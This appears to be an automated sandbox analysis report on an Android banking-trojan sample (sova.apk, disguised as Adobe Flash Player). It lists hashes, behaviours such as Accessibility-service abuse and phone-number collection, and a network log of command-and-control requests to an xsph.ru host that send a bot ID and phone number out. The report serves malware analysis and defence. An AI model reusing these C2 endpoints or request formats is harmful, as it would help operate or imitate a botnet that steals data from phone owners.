Resubmissions

24/04/2024, 11:50 UTC

240424-nzl72ahe3w 10

12/04/2024, 13:59 UTC

240412-ravpnaah86 10

28/02/2024, 13:25 UTC

240228-qnw9zacf2t 8

28/02/2024, 12:56 UTC

240228-p6fjhacb22 10

19/02/2024, 08:01 UTC

240219-jw15kaba7y 10

03/01/2024, 08:46 UTC

240103-kpajpscdcp 10

Analysis

  • max time kernel
    274s
  • max time network
    307s
  • platform
    android_x64
  • resource
    android-33-x64-arm64-20240229-en
  • resource tags
    android, arch:arm64, arch:x64, image:android-33-x64-arm64-20240229-en, locale:en-us, os:android-13-x64, system
  • submitted
    12/04/2024, 13:59 UTC

General

  • Target

    sova.apk

  • Size

    569KB

  • MD5

    01b6f0220794476fe19a54c049600ab3

  • SHA1

    eb9dfde47a393bca666e947f285f16c20baf6c32

  • SHA256

    8a6889610a18296e812fabd0a4ceb8b75caadc5cec1b39e8173c3e0093fd3a57

  • SHA512

    ac3031a6dbc5bb0d1e609979336487f14efe58f8e87480e5ef7f79c2abae56977ca444bbb5bbc7970d9c416f9c754b9fedf2bdef3b7b311c2e95e07350f9c892

  • SSDEEP

    12288:C89uYjYV1jiNQ7l5DFQo2d8GmEFDipRdWp8+iZiZ5t:9jYniCF6d8iiXg825t

Malware Config

Signatures

  • Makes use of the framework's Accessibility service 2 TTPs 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

  • Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
  • Queries the phone number (MSISDN for GSM devices) 1 TTPs
  • Requests enabling of the accessibility settings. 1 IoCs
  • Acquires the wake lock 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Requests disabling of battery optimizations (often used to enable hiding in the background). 1 TTPs 1 IoCs

Processes

  • com.adobe.flashplayer
    1⤵
    • Makes use of the framework's Accessibility service
    • Requests enabling of the accessibility settings.
    • Acquires the wake lock
    • Requests disabling of battery optimizations (often used to enable hiding in the background).
    PID:4301

Network

  • GB
    GET
    http://play.googleapis.com/generate_204
    Remote address:
    216.58.204.74:80
    Request
    GET /generate_204 HTTP/1.1
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
    Host: play.googleapis.com
    Accept-Encoding: gzip
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Fri, 12 Apr 2024 14:00:06 GMT
    Connection: close
  • GB
    GET
    http://play.googleapis.com/generate_204
    Remote address:
    172.217.169.42:80
    Request
    GET /generate_204 HTTP/1.1
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
    Host: play.googleapis.com
    Accept-Encoding: gzip
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Fri, 12 Apr 2024 14:00:07 GMT
    Connection: close
  • US
    DNS
    www.google.com
    Remote address:
    1.1.1.1:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    216.58.201.100
  • US
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN A
    172.67.74.152
    api.ipify.org
    IN A
    104.26.13.205
    api.ipify.org
    IN A
    104.26.12.205
  • US
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
  • US
    DNS
    a0545193.xsph.ru
    Remote address:
    1.1.1.1:53
    Request
    a0545193.xsph.ru
    IN A
    Response
    a0545193.xsph.ru
    IN A
    141.8.197.42
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Fri, 12 Apr 2024 14:00:13 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Fri, 12 Apr 2024 14:00:13 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
  • US
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.200.46
  • US
    GET
    https://api.ipify.org/
    Remote address:
    172.67.74.152:443
    Request
    GET / HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
    Host: api.ipify.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Fri, 12 Apr 2024 14:00:17 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: keep-alive
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8733bde6af9b93ed-LHR
  • US
    DNS
    lh3.googleusercontent.com
    Remote address:
    1.1.1.1:53
    Request
    lh3.googleusercontent.com
    IN A
    Response
    lh3.googleusercontent.com
    IN CNAME
    googlehosted.l.googleusercontent.com
    googlehosted.l.googleusercontent.com
    IN A
    142.250.180.1
  • US
    DNS
    remoteprovisioning.googleapis.com
    Remote address:
    1.1.1.1:53
    Request
    remoteprovisioning.googleapis.com
    IN A
    Response
    remoteprovisioning.googleapis.com
    IN A
    142.250.200.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.187.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.212.234
    remoteprovisioning.googleapis.com
    IN A
    142.250.187.202
    remoteprovisioning.googleapis.com
    IN A
    172.217.16.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.204.74
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.42
    remoteprovisioning.googleapis.com
    IN A
    142.250.180.10
    remoteprovisioning.googleapis.com
    IN A
    216.58.213.10
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.74
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.178.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.179.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.201.106
    remoteprovisioning.googleapis.com
    IN A
    142.250.200.42
  • 173.194.76.188:5228
    tls
    128 B
    40 B
    2
    1
  • 142.250.200.36:443
    www.google.com
    tls
    1.0kB
    4.7kB
    8
    8
  • 216.58.204.74:80
    http://play.googleapis.com/generate_204
    http
    485 B
    414 B
    5
    5

    HTTP Request

    GET http://play.googleapis.com/generate_204

    HTTP Response

    204
  • 142.250.200.4:443
    tls, https
    245 B
    40 B
    2
    1
  • 142.250.200.4:443
    www.google.com
    tls
    1.2kB
    4.8kB
    8
    6
  • 142.250.200.36:443
    www.google.com
    tls
    1.0kB
    4.7kB
    8
    8
  • 172.217.169.42:80
    http://play.googleapis.com/generate_204
    http
    485 B
    414 B
    5
    5

    HTTP Request

    GET http://play.googleapis.com/generate_204

    HTTP Response

    204
  • 216.58.201.100:443
    www.google.com
    tls
    1.4kB
    5.7kB
    11
    12
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1
    http
    445 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567
    http
    453 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    2.4kB
    360 B
    18
    6

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
    http
    2.7kB
    360 B
    18
    6

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
  • 142.250.200.46:443
    android.apis.google.com
    tls
    3.5kB
    7.3kB
    14
    14
  • 172.67.74.152:443
    https://api.ipify.org/
    tls, http
    1.2kB
    6.2kB
    8
    7

    HTTP Request

    GET https://api.ipify.org/

    HTTP Response

    200
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 142.250.187.196:443
    520 B
    10
  • 142.250.187.196:443
    www.google.com
    tls
    8.3kB
    222.8kB
    95
    173
  • 142.250.187.196:443
    www.google.com
    tls
    1.1kB
    5.9kB
    11
    9
  • 216.58.204.78:443
    tls, https
    496 B
    40 B
    3
    1
  • 216.58.204.78:443
    encrypted-tbn0.gstatic.com
    tls
    3.3kB
    42.4kB
    39
    38
  • 142.250.180.1:443
    lh3.googleusercontent.com
    tls
    1.3kB
    10.8kB
    13
    11
  • 142.250.180.1:443
    lh3.googleusercontent.com
    tls
    3.7kB
    65.8kB
    47
    55
  • 142.250.200.4:443
    www.google.com
    tls
    4.9kB
    10.4kB
    32
    30
  • 172.64.41.3:443
    tls, https
    409 B
    40 B
    3
    1
  • 172.64.41.3:443
    chrome.cloudflare-dns.com
    tls
    2.1kB
    4.5kB
    17
    13
  • 142.250.178.3:443
    update.googleapis.com
    tls
    5.1kB
    11.3kB
    22
    18
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    120 B
    2
  • 141.8.197.42:80
    a0545193.xsph.ru
    240 B
    4
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 142.250.200.10:443
    remoteprovisioning.googleapis.com
    tls
    3.5kB
    13.6kB
    16
    16
  • 142.250.180.10:443
    remoteprovisioning.googleapis.com
    tls, https
    12.8kB
    40 B
    6
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    120 B
    2
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 216.58.212.232:443
    tls
    135 B
    40 B
    2
    1
  • 172.217.16.226:443
    tls
    135 B
    40 B
    2
    1
  • 216.58.212.198:80
    468 B
    9
  • 172.217.16.226:443
    tls
    135 B
    40 B
    2
    1
  • 216.58.212.198:443
    tls
    135 B
    40 B
    2
    1
  • 142.250.187.194:443
    tls
    135 B
    40 B
    2
    1
  • 142.250.178.14:443
    tls
    135 B
    40 B
    2
    1
  • 216.239.34.36:443
    tls
    135 B
    40 B
    2
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
    1
  • 224.0.0.251:5353
    3.7kB
    11
  • 142.250.200.4:443
    https
    330 B
    70 B
    1
    1
  • 1.1.1.1:53
    www.google.com
    dns
    60 B
    76 B
    1
    1

    DNS Request

    www.google.com

    DNS Response

    216.58.201.100

  • 1.1.1.1:53
    api.ipify.org
    dns
    118 B
    107 B
    2
    1

    DNS Request

    api.ipify.org

    DNS Request

    api.ipify.org

    DNS Response

    172.67.74.152
    104.26.13.205
    104.26.12.205

  • 1.1.1.1:53
    a0545193.xsph.ru
    dns
    62 B
    78 B
    1
    1

    DNS Request

    a0545193.xsph.ru

    DNS Response

    141.8.197.42

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
    109 B
    1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.200.46

  • 142.250.187.196:443
    https
    3.5kB
    8.8kB
    12
    13
  • 1.1.1.1:53
    lh3.googleusercontent.com
    dns
    71 B
    116 B
    1
    1

    DNS Request

    lh3.googleusercontent.com

    DNS Response

    142.250.180.1

  • 216.58.204.78:443
    https
    3.7kB
    23.4kB
    14
    23
  • 172.64.41.3:443
    https
    3.4kB
    4.7kB
    10
    10
  • 142.250.178.3:443
    https
    24.5kB
    17.3kB
    61
    73
  • 142.250.200.4:443
    https
    9.4kB
    15.1kB
    72
    61
  • 1.1.1.1:53
    remoteprovisioning.googleapis.com
    dns
    79 B
    319 B
    1
    1

    DNS Request

    remoteprovisioning.googleapis.com

    DNS Response

    142.250.200.10
    142.250.187.234
    216.58.212.234
    142.250.187.202
    172.217.16.234
    216.58.204.74
    172.217.169.42
    142.250.180.10
    216.58.213.10
    172.217.169.74
    172.217.169.10
    142.250.178.10
    142.250.179.234
    216.58.201.106
    142.250.200.42

MITRE ATT&CK Mobile v15

Downloads
